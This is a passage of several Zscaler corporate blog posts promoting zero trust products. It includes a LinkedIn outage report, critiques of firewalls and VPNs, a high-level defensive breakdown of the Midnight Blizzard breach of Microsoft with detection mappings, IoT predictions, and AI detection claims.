no extra cost to ZIA customers. ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to: A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools. Zscaler Sandbox detects zero-day malware for future-proof protection while Zscaler Firewall provides IPS and DNS control and filtering of the latest non-web threats. Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure—that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times. Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers. The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off-network, is fully inspected with unlimited capacity—including all TLS/SSL encrypted traffic. Learn more about how Zscaler prevents encrypted attacks and best practices to stop encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report. Mon, 11 März 2024 07:00:01 -0700 Brendon Macaraeg LinkedIn Outage Detected by Zscaler Digital Experience (ZDX) At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale. ZDX dashboard indicating widespread LinkedIn outage ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause, reducing mean time to resolve (MTTR) and first response time (MTTD). ZDX dashboard showing LinkedIn global issues ZDX Score highlights LinkedIn outageVisible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score will adjust accordingly. The dashboard shows that the ZDX Score for the LinkedIn probes dropped to ZERO during the outage window of approximately 1 hour. From within ZDX, service desk teams can easily see that the service degradation isn’t limited to a single location or user and quickly begin analyzing the root cause. ZDX Score indicating LinkedIn outage and recovery (times in EST) Also in the ZDX dashboard, “Web Probe Metrics” highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests. ZDX Web Probe Metrics indicating 503 errors (times in EST) ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive. With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. As you can see, in the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine. ZDX AI-powered root cause analysis indicates the reason for the outage When there’s an application outage, many IT teams turn to the network as the root cause. However, as you can see above, ZDX AI-powered root cause analysis verified that the network transport wasn’t the issue; it was actually at the application level. You can verify this by looking at the CloudPath metrics from the user to the destination. ZDX CloudPath showing full end-to-end data path ZDX CloudPath detailed hops between the nodes With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function determines a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics. The end user comparison during the LinkedIn outage vs. a known good score indicates the ZDX Score difference, highlighting the unexpected performance drop for the end user. ZDX comparison mode identifies the change in user experience According to the LinkedIn status page, the outage was reported at 12:50 PST until 14:05 PST, which correlates to the ZDX data above. However, LinkedIn services started to recover pretty quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST. Source: LinkedIn With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically with our service desk integration (e.g., ServiceNow) long before users started to report it. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time. Zscaler Digital Experience successfully detected a LinkedIn outage along with its root cause, giving our customers the confidence that it was not a single location, their networks, or devices, averting critical impact to their business. Try Zscaler Digital Experience today ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us. Thu, 07 März 2024 19:14:07 -0800 Rohit Goyal Why Haven’t Firewalls and VPNs Stopped More Organizations from Being Breached? Reducing cyber risk is an increasingly important initiative for organizations today. Due to the fact that a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals’ malicious ends. Specifically, the go-to tools that are deployed in an effort to enhance security are firewalls and VPNs. Despite the above, breaches continue to occur (and increase in number) at an alarming rate every year. News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient. One needs not look far for concrete examples—the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong. With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven’t firewalls and VPNs stopped more organizations from being breached? The weaknesses of perimeter-based architectures Firewalls and VPNs were designed for an era gone by; when users, apps, and data resided on premises; when remote work was the exception; when the cloud had not yet materialized. And in this age of yesteryear, their primary focus was on establishing a safe perimeter around the network in order to keep the bad things out and the good things in. Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, network-centric, and more. In other words, firewalls, VPNs, and the architecture that they presuppose are intended for an on-premises-only world that no longer exists. The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges. These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and—of primary importance for our topic in this blog post—increased risk. How do firewalls and VPNs increase risk? There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects. Whether they are hardware appliances or virtual appliances makes little difference. They expand the attack surface. Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface is continually expanded, and the problem is worsened. They enable compromise. Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations. They allow lateral threat movement. Firewalls and VPNs are what primarily compose the “moat” in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means that there is little protection once a threat actor gets into the “castle,” i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage. They fail to stop data loss. Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure. Similarly, modern data leakage paths, such as sharing functionality inside of SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist. Why zero trust can stop organizations from being breached Zero trust is the solution to the above problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past. With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can: Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections Stop compromise: Leverage a high performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats Prevent lateral movement: Connect users, devices, and workloads directly to apps they are authorized to access instead of connecting them to the network as a whole Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more. If you would like to learn more about zero trust, join our upcoming webinar, “Start Here: An Introduction to Zero Trust.” Or, if you would like to dive deeper on the weaknesses of yesterday’s tools, read our new ebook, “4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches.” Tue, 27 Feb 2024 08:04:02 -0800 Jacob Serpa Microsoft, Midnight Blizzard, and the Scourge of Identity Attacks Summary On January 19, 2024, technology leader Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage. While we will break down the attack step-by-step and explain what organizations can do to defend against similar attacks below, here’s a TL;DR. The threat actor Midnight Blizzard: State-sponsored Russian threat actor also known as Nobelium, CozyBear, and APT 29 Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020) The facts Attack target: Microsoft’s Entra ID environment Techniques used: Password spraying, exploiting identity and SaaS misconfigurations Impact: Compromised Entra ID environment, unauthorized access to email accounts of Microsoft’s senior leadership team, security team, legal, and more What’s unique about the attack? Using stealthy identity tactics that bypasses existing defenses to compromise users Exploiting misconfigurations in SaaS applications to gain privileges Exploiting identity misconfigurations in Entra ID to escalate privileges The attack sequence Found a legacy, non-production test tenant in Microsoft’s environment. Used password spraying via residential proxies to attack the test app tenant. Limited the number of attack attempts to stay under the threshold and evade blocking triggered by brute forcing heuristics. Guessed the right password and compromised the test tenant’s account. Generated a new secret key for the Test App that allowed the threat actor to control the app every where it was installed. Test App was also present in the corporate tenant. Threat actor used the app’s permissions to create an admin user in the corporate tenant. Used the new admin account to create malicious OAuth apps. Granted the malicious app the privilege to impersonate the users of the Exchange service. Used the malicious app to access Microsoft employee email accounts. Microsoft’s official guidance Defend against malicious OAuth applications Audit privileged identities and apps in your tenant Identify malicious OAuth apps Implement conditional access app control for unmanaged devices Protect against password spray attacks Eliminate insecure passwords Detect, investigate, and remediate identity-based attacks Enforce multi factor authentication and password protections Investigate any possible password spray activity Zscaler’s guidance Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths. Continuously assess Active Directory and Entra ID (previously known as Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths. Monitor users with risky permissions and misconfigurations for malicious activity like DCSync, DCShadow, kerberoasting, etc. that is typically associated with an identity attack. Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint on an identity attack detection. Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement for instances where stealthy attacks bypass existing detection and monitoring controls. Deconstructing the attack The threat actor Midnight Blizzard has had a long history of pulling off highly publicized breaches. It’s Microsoft this time around, but in the past, they’ve allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise. Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise and exploiting misconfigurations/permissions in SaaS applications and identity stores to execute breaches that conventional security thinking cannot defend against. Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society. In case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and attack techniques to evade detection controls. They created malicious applications to navigate Microsoft's corporate environment. And by manipulating the OAuth permissions, they granted themselves full access to Office 365 Exchange mailboxes, enabling them to easily exfiltrate sensitive emails. Security challenges Identity-centric tactics: Midnight Blizzard strategically targeted identities, exploiting the user's credentials as a gateway to sensitive data. Conventional detection controls like EDRs are not effective against such attacks. OAuth application abuse: The adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence. Misconfiguration blind spots: Identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often resulting in blind spots for defenders. Step-by-step breakdown Pre-breach Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purpose of this blog post, let’s call this app ‘TestApp.’ For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the scope Directory.ReadWrite.all, granting it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten. ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfiguration and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches. Initial access In late November 2023, Midnight Blizzard initiated reconnaissance on Microsoft's SaaS environment. Discovering the test tenant, the attacker targeted its admin account, which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords to gain access, leveraging residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker successfully compromised the admin account. ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA-prompt bombing, and other identity-centric techniques to compromise users. Persistence With control over the admin account, the attacker obtained the ability to generate a new secret key for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020. ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes being made to permissions in SaaS applications, attacks like these easily cross the initial access phase of the kill chain. Privilege escalation Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, leveraging TestApp to grant elevated roles, such as Exchange role EWS.full_access_as_app, facilitating mailbox access and bypassing MFA protection. ThreatLabz note: Configuration and permission based blindspots extend to identities themselves. As such, it is imperative that organizations have the ability to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that give attackers the ability to escalate privileges from a compromised identity. They should also continuously monitor for malicious changes in the identity store that might potentially be creating additional attack surfaces. Lateral movement Though specifics regarding the number and origin of installed apps remain unclear, the attacker's utilization of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders. How zero trust can help A zero trust architecture provides a fundamentally secure approach that is better at protecting against stealthy attacks that are used by nation-state threat actors and organized adversaries. Zero trust fundamentally eliminates weaknesses in your environment that are core properties of hub and spoke network models. Below is a 10,000 foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks. Core zero trust capabilities This is the heart of a zero trust architecture consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the Internet, thereby eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker the connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy. ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints to remove lateral movement paths. Below, we breakdown what each of these capabilities can do. SaaS Security While the move to the cloud and SaaS applications has aided organizations to accelerate their digital transformation, it has also created a new set of security challenges. Among these, the lack of visibility into dangerous backdoor connections to SaaS applications is paramount as it creates supply chain risk — the kind that was exploited in the Microsoft breach. SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, risky permissions, and continuous monitoring for changes that can be malicious in nature. It is a core step in securing your SaaS environment. Identity Posture Management Nine in ten organizations are exposed to Active Directory attacks and there has been a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena. Misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these types of attacks. For example, an unprivileged account without MFA having the ability to control an application with privileged roles should be flagged, but most security teams do not have appropriate visibility into these types of misconfigurations. Identity Posture Management augments zero trust by providing security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can leverage remediation guidance to revoke permissions, limit policies, and remove misconfigurations. Identity Posture Management also alerts security teams to malicious changes in the Active Directory in real time. Deception and ITDR (Identity Threat Detection and Response) As evidenced in the Microsoft breach, attackers used password spraying from a residential proxy and limited the number of tries to evade detection. Traditional threat detection and monitoring approaches just do not work here. Deception, on the other hand, is a pragmatic approach that can detect these attacks with fairly high confidence. Decoy users created in Entra ID can detect such password spraying attacks without false positives or the need to write complex detection rules. ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot. Identity Credential Exposure While TTPs (Techniques, Tactics, and Procedures) were not reported for credential exploitation, credentials and other sensitive material (like username, passwords, authentication tokens, connection strings, etc.) on the endpoint in files, registry, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches. Identity Credential Exposure provides security teams with visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint. Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks Problem Solution How does it work? MITRE ATT&CK Technique Password spraying Zscaler Deception Decoy user accounts in Entra ID can detect any attempts to sign in using the credentials of the decoy users. Any failed/successful attempts will be logged to detect attacks like password spraying T1110.003 - Brute Force: Password Spraying T1078.004 - Valid Accounts: Cloud Accounts Existence of apps/SPNs with high privilege Zscaler ITDR ITDR can surface unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles NA Creation of apps/SPNs with high privilege Zscaler SaaS Security Monitoring for and alerting when a risky app is added, app is created by an unverified publisher, and when an app hasn’t been used in a while There is no technique that maps to this but in terms of the nature of the technique, the ones listed below are a close approximation of how you think of the attack. T1136.003 - Create Account: Cloud Account T1098.003 - Account Manipulation: Additional Cloud Roles Creation/modification of users with high privileges Zscaler ITDR Monitoring of an alerting on unauthorized addition of privileged permissions to principals T1136.003 - Create Account: Cloud Account T1098.003 - Account Manipulation: Additional Cloud Roles Secret addition to apps Zscaler SaaS Security Flags applications with multiple Application Secrets T1098.001 - Account Manipulation: Additional Cloud Credentials Disabled MFA Zscaler ITDR Find accounts where MFA is disabled and get alerts when MFA is disabled for any account T1556.006 - Modify Authentication Process: Multi-Factor Authentication Consent grants Zscaler SaaS Security Monitors inclusion of high risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All to alert on the app’s risk level T1098.003 - Account Manipulation: Additional Cloud Roles T1098.002 - Account Manipulation: Additional Email Delegate Permissions What should I do next? Identity is the weakest link. Irrespective of whether you are running a zero trust architecture or not, start by getting visibility into identity misconfigurations and excessive permissions that can allow attackers to grant themselves privileges. We’re offering a complimentary Identity Posture Assessment with Zscaler ITDR. Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security. Implement Deception irrespective of what other threat detection measures you have. It is one of the highest ROI threat detection controls that you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers. If you are a Zscaler customer, contact your account manager for support on these assessments and Deception rollout. Tue, 13 Feb 2024 17:10:20 -0800 Amir Moin Start Your Journey in IT Support: A Beginner's Guide Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner’s Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers who are eager to become influential service desk team members. It’s a practical guide even for those with limited time. Whether you're dealing with device issues, network complexities, or application troubleshooting, you’ll find step-by-step instructions that are easy to follow even with minimal IT knowledge. We’ve designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team. In this ebook, you'll find: An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity. Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues, enhancing customer satisfaction efficiently. Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them. A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions. Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving. It’s also an excellent tool for service desk managers to expedite team onboarding. By equipping your team with this resource, you’ll enable them to handle a wide range of IT issues independently. It reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can help not only enhance your service desk team’s capabilities, but also significantly shorten the time it takes for new analysts to become proficient. Download the ebook today and transform your service desk team! Fri, 09 Feb 2024 19:14:07 -0800 Rohit Goyal IoT/OT Predictions for 2024 How many smart home devices are you running where you live? Smart speakers, thermostats, cameras, light bulbs, etc. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices out in the world by the end of this year! By my calculation that works out to more than 25 devices for every human on the planet! In this blog, we’ll cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let’s jump in. IoT/OT devices will see a higher degree of proliferation than ever before Losing count of how many devices you have isn’t just a nuisance in the workplace; it’s a very real problem, particularly from a cybersecurity perspective. The challenge of keeping track of your IoT devices—not to mention keeping them secure—is only going to grow harder with the proliferation of sensors, monitors, point-of-sale, and myriad other devices that are feeding our hunger for data. Fortunately we’ve been working on that. Edge AI will make these devices smarter, faster No predictions blog post for 2024 would be complete without mention of the topic on everyone’s lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT is inevitable. It will only improve as time passes, increasing the number of autonomous decisions being made without oversight. This can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it can also be a risk, if mishandled. 5G and other WAN connectivity will evolve to meet the needs of IoT/OT It seems we’ve been hearing about 5G forever, but it’s now starting to truly gain traction in the workplace as a new way to connect devices via the internet with minimal latency and without requiring a local network infrastructure. And it’s not alone—newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront. This simply means we’re able to deploy sensors and other kinds of IoT devices into more locations, including remote and mobile ones, growing the number of potential use cases for the technology. Digital twins will still serve as proving grounds The accelerated growth in the number of sensors continues to cultivate the use of digital twins; virtual representations of the world around them that help us visualize and improve remote systems. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we’re monitoring. This will enable us to drive resource optimization and efficiency, and pave the way for the adoption of more sustainable systems. Taking all of these developments in aggregate, it’s plain to see that when it comes to IoT and OT growth, ‘we ain’t seen nothing yet’! As with all technological advances, there’s the potential that they will make our lives better and businesses more efficient and profitable. At the same time, it’s vital to ensure security is consideration number one when it comes to planning their deployment, especially when it comes to devices that talk to the internet. This brings us to the flip side of these predictions: the challenges they pose. Data privacy The combination of ubiquitous sensors and the rise of AI making use of the data they collect naturally leads us to consider data privacy. Regulations around the world, perhaps most famously the EU’s GDPR, ensure that privacy is a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for potentially nefarious uses. Ransomware on the (continued) rise As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, over 37% in fact. At the same time, it’s becoming easier than ever to launch such attacks, aided by readily available AI and Ransomware-as-a-Service (RaaS) kits. The firmware problem Remember earlier when I asked you if you knew how many devices you have deployed? Here’s another one for you. Of those devices, how many of them have their firmware up to date? Do you even know what firmware they’re running to be able to establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability. A single compromised device could be all an attacker needs to begin their hunt for more damage to cause or data to steal. The ongoing risks presented by legacy security As the cybersecurity industry continues to incessantly point out, traditional security technology practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door for lateral movement across networks and geographical boundaries, allowing bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger. All of these challenges and more point to only one conclusion: Organizations must adopt a zero trust security architecture in order to protect the IoT and OT devices they will inevitably deploy this year. Conclusion On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit positively we must put security first. This doesn’t mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust. If you’re new to zero trust and want to learn more, we’d like to welcome you to one of our monthly introductory live webinars where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else. Click here and search ‘start here’ to find the next session to sign-up for. Tue, 06 Feb 2024 01:00:02 -0800 Simon Tompson Why Firewalls and VPNs Give You a False Sense of Security Firewalls and VPNs were once hailed as the ultimate solutions for robust enterprise security, but in today’s evolving threat landscape, organizations face a growing number of breaches and vulnerabilities that are outpacing these solutions. Today, the world we work in looks very different from the on-premises era as industries transform how and where work gets done. Firewalls and VPNs are crumbling pillars of a bygone era. They provide a false sense of security because they come with significant weaknesses that put companies at risk—weaknesses that are only realized when embracing digital transformation. Innovation in generative AI, automation, and IoT/OT technologies across industries is set to continue breaking barriers in 2024. This innovation also opens the door for attackers to automate phishing campaigns, craft evasive malware, reduce the development time of threats using AI, and even sell Ransomware-as-a-Service (RaaS). With the growing severity and number of breaches, there’s a heightened concern that VPN vulnerabilities will leave the door open for attackers. According to a Cybersecurity Insider survey, nearly 50% of organizations experienced VPN-related attacks from July 2022 to July 2023, and 90% of organizations are concerned about attackers exploiting third-party vendors to gain backdoor access into their networks through VPNs. It’s becoming clear that even the largest organizations with advanced firewalls still fall victim to breaches. Curious to know some of the reasons that firewalls and VPNs are letting organizations down? Read more below. A thinner sheet of protection across a larger attack surface VPNs and firewalls extend the network, increasing the attack surface with public IP addresses as they connect more users, devices, locations, and clouds. Users can now work from anywhere with an internet connection, further extending the network. The proliferation of IoT devices has also increased the number of Wi-Fi access points across this extended network, including that seemingly harmless Wi-Fi connected espresso machine needed for a post-lunch boost, creating new attack vectors to exploit. Perimeter-based architecture means more work for IT teams More doesn’t mean better when it comes to firewalls and VPNs. Expanding a perimeter-based security architecture rooted in firewalls and VPNs means more deployments, more overhead costs, more time wasted for IT teams - but less security and less peace of mind. Pain also comes in the form of degraded user experience and satisfaction with VPN technology for the entire organization due to backhauling traffic (72% of organizations are slightly to extremely dissatisfied with their VPN experience). Other challenges like the cost and complexity of patch management, security updates, software upgrades, and constantly refreshing aging equipment as an organization grows are enough to exhaust even the largest and most efficient IT teams. The bigger the network, the more operational complexity and time required. VPNs and firewalls can’t effectively guard against today’s threat landscape VPNs and firewalls deployed to protect and defend network access behave a lot like a security guard who sits at the front of a store in order to stop theft. Security Guards Firewalls and VPNs Stationed at the front door of a valuable store - tasked with identifying and stopping attacks. Can’t monitor all entrances at the same time. Deployed at key access points to an organization’s network. Can’t stop all the threats across every access point. Once an attacker gets in, they get access to the entire store. Permit lateral threat movement by placing users and entities onto the network. 1:few threat detection can’t scale unless you hire a lot of security guards to monitor all entrances. Can’t inspect encrypted traffic and enforce real-time security policies at scale. Can be slow, tired, expensive to hire, late for their shift and present a number of other issues that allow threats to go undetected and unanswered. Suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more. Much like a lone security guard, VPNs and firewalls can help mitigate some risk, but they can’t keep up with the scale and complexity of the cybercrime of today. Your network is extending exponentially as you digitally transform your organization. With constant attacks on the horizon and a thinner cover of protection, how many million security guards can you hire? The Zero Trust Exchange delivers on the promise of security Unlike network-centric technologies like VPNs - zero trust architecture minimizes your attack surface and connects users to the apps they need directly—without putting anyone or anything on the network as a whole. Zscaler delivers zero trust with its cloud native platform: the Zscaler Zero Trust Exchange. The Zero Trust Exchange starts with the premise that no user, workload, or device is inherently trusted. The platform brokers a secure connection between a user, workload, or device and an application—over any network, from anywhere by looking at identity, app policies, and risk. As threats grow more dangerous, we can’t rely on a single security guard to keep everybody out anymore. VPNs and firewalls were designed to make organizations feel secure, but with all the evolving threats of today highlighting the cracks in these technologies, IT and security teams are left with a false sense of security. Truly secure digital transformation can only be delivered by implementing a zero trust architecture. The Zscaler Zero Trust Exchange is the comprehensive cloud platform designed to keep your users, workloads, IoT/OT, and B2B traffic safe in an environment where VPNs and firewalls can’t. If you’d like to learn more, join our webinar that serves as an introduction to zero trust and provides entry-level information about the topic. Or, if you’d like to go a level deeper, consider registering for one of our interactive whiteboard workshops for free Mon, 05 Feb 2024 14:26:59 -0800 Sid Bhatia AI Detections Across the Attack Chain Organizations face a constant barrage of cyberthreats. To combat these sophisticated attacks, Zscaler delivers layered security protections to deliver more effective security postures across the four key stages of an attack - attack surface discovery, compromise, lateral movement, and data exfiltration. Heading into 2024, with all the buzz surrounding artificial intelligence (AI) over the past year, we are asked daily by prospects and customers, "Zscaler, how do you use AI to keep us safer?" For more on where we see AI and security headed in 2024, please see the blog from our founder, Jay Chaudhry. In this blog, we will explore a handful of examples of Zscaler AI use across key stages of an attack—demonstrating how it can detect and stop threats, protect data, and make teams more efficient. Truth be told, we began to add AI detections into our portfolio some years ago to further bolster other detection methods, and it has paid off. Stage 1: Attack surface discovery While we will spend the better part of this blog discussing AI in other areas, the first stage of an attack involves attackers probing attack surfaces to identify potential weaknesses be exploited. These are often things like VPN/firewall misconfigurations or vulnerabilities, or unpatched servers. We wholeheartedly suggest considering ways to cloak your currently discoverable applications behind Zscaler to immediately reduce your attack surface and reduce your risk of successful attacks Stage 2: Risk of compromise During the compromise stage, attackers exploit vulnerabilities to gain unauthorized access to employee systems or applications. Zscaler's AI-powered products help reduce risk of compromise while prioritizing productivity. AI-powered phishing/C2 prevention: We better detect and stop credential theft and browser exploitation from phishing pages with real-time analytics on threat intelligence from 300 trillion daily signals, ThreatLabz research, and dynamic browser isolation. This means our AI makes us even more efficient in detecting new phishing or C2 domains. File-based attacks: We use AI in our cloud sandbox to ensure there is no tradeoff between security and productivity. Historically, in the case of the sandbox, a new file arrives and users must wait as it is analyzed, interrupting productivity. Our AI Instant Verdict in the sandbox prevents patient zero infections by instantly blocking high-confidence malicious files using AI, eliminated the need to wait for analysis on file we feel are very likely malicious. Our model fidelity is a result of years of ongoing training, analysis, and tuning interactions based on over 550 million file samples. AI to block web threats: Additionally, Zscaler's AI-powered browser isolation blocks zero day threats while ensuring employees can access the right sites to get their jobs done. URL filtering is effective in keeping users safe, but given that sites are either allowed or blocked, sometimes sites that are 